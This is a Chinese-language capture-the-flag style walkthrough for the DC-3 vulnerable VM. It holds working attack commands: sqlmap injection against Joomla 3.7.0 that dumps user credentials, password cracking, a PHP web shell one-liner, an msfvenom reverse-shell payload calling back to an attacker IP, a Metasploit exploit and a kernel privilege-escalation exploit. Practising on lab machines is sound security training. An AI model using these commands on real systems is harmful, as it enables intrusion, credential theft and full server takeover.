DC-3 靶机渗透测试详细教程<\/h1>

一、靶机环境准备<\/h2>
下载靶机镜像：
下载地址：https:\/\/download.vulnhub.com\/dc\/DC-3-2.zip<\/li>
解压后导入到虚拟机软件（如VMware或VirtualBox）<\/li> <\/ul> <\/li> <\/ol>
二、信息收集阶段<\/h2>

1. 主机发现<\/h3>
使用以下命令之一发现目标IP：<\/p>
arp-scan -l
<\/span><\/span># 或<\/span>
<\/span><\/span>nmap -sn 10.1.2.0\/24
<\/span><\/span><\/code><\/pre>假设发现目标IP为：10.1.2.148<\/p>
2. 端口扫描<\/h3>
nmap -p- 10.1.2.148
<\/span><\/span><\/code><\/pre>发现只开放了80端口<\/p>
3. 服务探针<\/h3>
nmap -p80 -sV 10.1.2.148
<\/span><\/span><\/code><\/pre>确定Web服务详细信息<\/p>
三、Web应用分析<\/h2>


访问Web界面：http:\/\/10.1.2.148<\/p>
<\/li>

目录爆破：<\/p>
dirb http:\/\/10.1.2.148
<\/span><\/span><\/code><\/pre>或使用其他工具如gobuster<\/p>
<\/li>

发现使用Joomla CMS，使用joomscan扫描：<\/p>
joomscan -u http:\/\/10.1.2.148
<\/span><\/span><\/code><\/pre>如果没有安装joomscan：<\/p>
sudo apt install joomscan
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
四、漏洞利用<\/h2>
1. 搜索已知漏洞<\/h3>
searchsploit Joomla 3.7.0
<\/span><\/span><\/code><\/pre>发现存在SQL注入漏洞<\/p>
2. SQL注入利用<\/h3>
使用sqlmap进行自动化注入：<\/p>


爆数据库：<\/p>
sqlmap -u "http:\/\/10.1.2.148\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> --risk=<\/span>3<\/span> --level=<\/span>5<\/span> --random-agent --dbs -p list[<\/span>fullordering]<\/span> --batch
<\/span><\/span><\/code><\/pre><\/li>

爆数据表（假设数据库名为joomladb）：<\/p>
sqlmap -u "http:\/\/10.1.2.148\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> --risk=<\/span>3<\/span> --level=<\/span>5<\/span> --random-agent -D joomladb --tables -p list[<\/span>fullordering]<\/span> --batch
<\/span><\/span><\/code><\/pre><\/li>

爆用户表列信息：<\/p>
sqlmap -u "http:\/\/10.1.2.148\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> --risk=<\/span>3<\/span> --level=<\/span>5<\/span> --random-agent -D joomladb -T "#__users"<\/span> --columns -p list[<\/span>fullordering]<\/span>
<\/span><\/span><\/code><\/pre><\/li>

获取用户凭证：<\/p>
sqlmap -u "http:\/\/10.1.2.148\/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml"<\/span> --risk=<\/span>3<\/span> --level=<\/span>5<\/span> --random-agent -D joomladb -T "#__users"<\/span> -C username,password --dump
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
3. 密码破解<\/h3>

将获取的哈希保存到passwd.txt文件<\/li>
使用john破解：
john passwd.txt
<\/span><\/span><\/code><\/pre>破解得到密码：snoopy<\/li>
<\/ol>
五、获取Webshell<\/h2>
方法一：手动上传<\/h3>

使用获取的凭证登录Joomla后台<\/li>
在"扩展"->"模板"->"模板"中找到可编辑的模板文件<\/li>
创建或编辑PHP文件，插入以下代码：
<?<\/span>php<\/span> system<\/span>($_GET['cmd'<\/span>]); ?><\/span>
<\/span><\/span><\/span><\/code><\/pre>或使用反弹shell代码<\/li>
<\/ol>
方法二：使用msfvenom生成payload<\/h3>

生成PHP反弹shell：
msfvenom -p php\/meterpreter\/reverse_tcp LHOST=<\/span>攻击机IP LPORT=<\/span>8888<\/span> -f raw -o cmd.php
<\/span><\/span><\/code><\/pre><\/li>
上传生成的cmd.php文件<\/li>
<\/ol>
方法三：使用Metasploit自动化利用<\/h3>
msfconsole
<\/span><\/span>search joomla
<\/span><\/span>use exploit\/multi\/http\/joomla_contenthistory_sqli_rce
<\/span><\/span>set rhosts 10.1.2.148
<\/span><\/span>exploit
<\/span><\/span><\/code><\/pre>六、权限提升<\/h2>
1. 获取稳定shell<\/h3>
在meterpreter会话中：<\/p>
shell
<\/span><\/span>python -c "import pty;pty.spawn('\/bin\/bash')"<\/span>
<\/span><\/span><\/code><\/pre>2. 查找SUID权限文件<\/h3>
find \/ -perm -u=<\/span>s -type f 2>\/dev\/null
<\/span><\/span><\/code><\/pre>发现at命令可能有利用价值<\/p>
3. 内核漏洞提权<\/h3>


检查系统版本：<\/p>
cat \/etc\/issue
<\/span><\/span><\/code><\/pre>发现是Ubuntu 16.04<\/p>
<\/li>

搜索相关漏洞：<\/p>
searchsploit Ubuntu 16.04
<\/span><\/span><\/code><\/pre>查看39772号漏洞<\/p>
<\/li>

下载并利用漏洞：<\/p>
searchsploit -x linux\/local\/39772.txt
<\/span><\/span># 在meterpreter中上传exp<\/span>
<\/span><\/span>upload \/path\/to\/exploit \/tmp\/exp
<\/span><\/span># 执行提权<\/span>
<\/span><\/span><\/code><\/pre><\/li>
<\/ol>
七、总结<\/h2>

通过SQL注入获取管理员凭证<\/li>
破解哈希后登录后台<\/li>
通过文件上传或模板编辑获取Webshell<\/li>
利用内核漏洞完成提权<\/li>
<\/ol>
关键点：<\/p>

Joomla 3.7.0的SQL注入漏洞利用<\/li>
密码哈希破解<\/li>
多种获取Webshell的方法<\/li>
内核漏洞提权技术<\/li>
<\/ul>